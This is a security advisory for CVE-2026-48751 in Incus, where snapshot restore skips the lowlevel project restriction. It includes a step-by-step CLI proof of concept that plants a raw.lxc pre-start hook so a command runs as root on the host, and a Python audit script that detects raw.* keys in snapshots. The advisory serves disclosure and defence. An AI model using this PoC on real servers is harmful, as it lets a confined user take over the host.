GHSA-48q5-w887-33wv

Source
https://github.com/advisories/GHSA-48q5-w887-33wv
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-48q5-w887-33wv/GHSA-48q5-w887-33wv.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-48q5-w887-33wv
Aliases
  • CVE-2026-48751
Published
2026-06-26T18:33:55Z
Modified
2026-06-26T18:45:22.090962610Z
Severity
  • 9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Summary
Incus has a restricted project bypass leading to arbitrary command execution
Details

Summary

Instance snapshots ignore the restricted.containers.lowlevel=block setting, allowing arbitrary command execution on the Incus server by abusing low-level hooks such as raw.lxc and raw.qemu.

Details

Because snapshots travel with an instance when it is moved between servers, an instance and snapshot carrying a low-level hook can be crafted in an unrestricted project, moved into a restricted project, and the snapshot restored there; the restore reinstates the hook without the project restriction being applied, and starting the instance runs it.

In practice, a user confined to a restricted project can execute arbitrary commands on the host as root, since the hooks are run by the Incus daemon.

PoC

# remote, restricted project
incus project set rem:project restricted=true
incus project set rem:project restricted.containers.lowlevel=block

# locally, in an unrestricted project: set a raw.lxc pre-start hook (it runs as
# root on the host when the container starts) and capture it in a snapshot
incus init images:debian/trixie rce-raw-lxc
incus config set rce-raw-lxc raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id >/lxc-hook-prestart"'
incus snapshot create rce-raw-lxc snap0
#> unset the key from the live config so the move passes the restriction check;
#> the snapshot still carries it
incus config unset rce-raw-lxc raw.lxc

# locally, transfer into the restricted project (the destination must be the
# restricted project, e.g. via --target-project) and trigger
incus move rce-raw-lxc rem: --mode push
incus snapshot restore rem:rce-raw-lxc snap0   # raw.lxc comes back unchecked
incus start rem:rce-raw-lxc                    # hook runs as root on the host

Impact

  • Bypass of project restrictions.
  • Arbitrary command execution on the Incus server.
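
The PoC above works because the live config is what the restriction checks, while the snapshot config is what a restore brings back. The following audit script is an added example (not Incus project code) of the check an operator of a pre-7.2.0 server can run against a restricted project: it flags any raw.* key found in a snapshot's config, reporting the live config alongside so the gap is visible. It assumes the Incus REST API shape for GET /1.0/instances?recursion=2 (a "config" map per instance and a "snapshots" list whose entries each carry a "name" and their own "config" map), that `incus query` prints the response metadata as JSON, and that the key list is the script's own choice of what to flag; the sample instances are constructed to mirror the PoC.

```python
"""Audit Incus snapshots for low-level config keys a restricted project should block.

Added example, not Incus code. Assumptions: the API shape described in the
lead-in, and that `incus query` prints response metadata as JSON.
"""
import json
import subprocess
import sys

# Keys the advisory names (raw.lxc, raw.qemu) plus other raw.* keys that the
# lowlevel restrictions are meant to cover. Assumption: this is the audit's
# own list, not read from Incus.
LOWLEVEL_KEYS = ("raw.lxc", "raw.qemu", "raw.idmap", "raw.seccomp", "raw.apparmor")


def is_lowlevel_key(key: str) -> bool:
    """True for an exact lowlevel key or a namespaced form such as raw.qemu.conf.X."""
    return any(key == k or key.startswith(k + ".") for k in LOWLEVEL_KEYS)


def audit_instances(instances: list) -> list:
    """Return (instance, snapshot, key, value) for every lowlevel key found.

    Live configs are reported with snapshot=None; snapshot configs carry the
    snapshot name. A clean live config next to a dirty snapshot is exactly
    the state the PoC produces.
    """
    findings = []
    for inst in instances:
        for key, value in sorted(inst.get("config", {}).items()):
            if is_lowlevel_key(key):
                findings.append((inst["name"], None, key, value))
        for snap in inst.get("snapshots") or []:
            for key, value in sorted(snap.get("config", {}).items()):
                if is_lowlevel_key(key):
                    findings.append((inst["name"], snap["name"], key, value))
    return findings


# Constructed sample mirroring the PoC: raw.lxc was unset from the live config
# before the move, but snap0 still carries the pre-start hook.
SAMPLE_INSTANCES = [
    {
        "name": "rce-raw-lxc",
        "type": "container",
        "config": {"image.os": "Debian"},
        "snapshots": [
            {
                "name": "snap0",
                "config": {
                    "image.os": "Debian",
                    "raw.lxc": 'lxc.hook.pre-start = /bin/sh -c "/bin/id >/lxc-hook-prestart"',
                },
            }
        ],
    },
    {
        "name": "web1",
        "type": "container",
        "config": {"limits.cpu": "2"},
        "snapshots": [{"name": "daily", "config": {"limits.cpu": "2"}}],
    },
]


def audit_project(remote: str, project: str) -> list:
    """Query a live server (needs the incus CLI and access to the project)."""
    path = f"{remote}:/1.0/instances?project={project}&recursion=2"
    out = subprocess.check_output(["incus", "query", path], text=True)
    return audit_instances(json.loads(out))


def format_findings(findings: list) -> str:
    """One line per finding, naming the snapshot or the live config."""
    lines = []
    for inst, snap, key, value in findings:
        where = f"{inst}/{snap}" if snap else f"{inst} (live config)"
        lines.append(f"{where}: {key} = {value}")
    return "\n".join(lines)


if __name__ == "__main__":
    # usage: audit.py <remote> <project>; with no arguments the sample is audited
    if len(sys.argv) == 3:
        results = audit_project(sys.argv[1], sys.argv[2])
    else:
        results = audit_instances(SAMPLE_INSTANCES)
    print(format_findings(results) or "no lowlevel keys found")
    sys.exit(1 if results else 0)
```

On the sample the script reports only rce-raw-lxc/snap0 with its raw.lxc hook and exits non-zero; the live config of the same instance is clean, which is why the move into the restricted project succeeded. The same snapshot config can be inspected by hand with `incus config show rem:rce-raw-lxc/snap0`. The audit is a stop-gap for identifying snapshots to delete; the fix is upgrading incusd to 7.2.0, where the restriction is applied on restore.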
Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-26T18:33:55Z",
    "severity": "CRITICAL"
}
References

Affected packages

Go / github.com/lxc/incus/v7/cmd/incusd

Package

Name
github.com/lxc/incus/v7/cmd/incusd
Purl
pkg:golang/github.com/lxc/incus/v7/cmd/incusd

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
7.2.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-48q5-w887-33wv/GHSA-48q5-w887-33wv.json"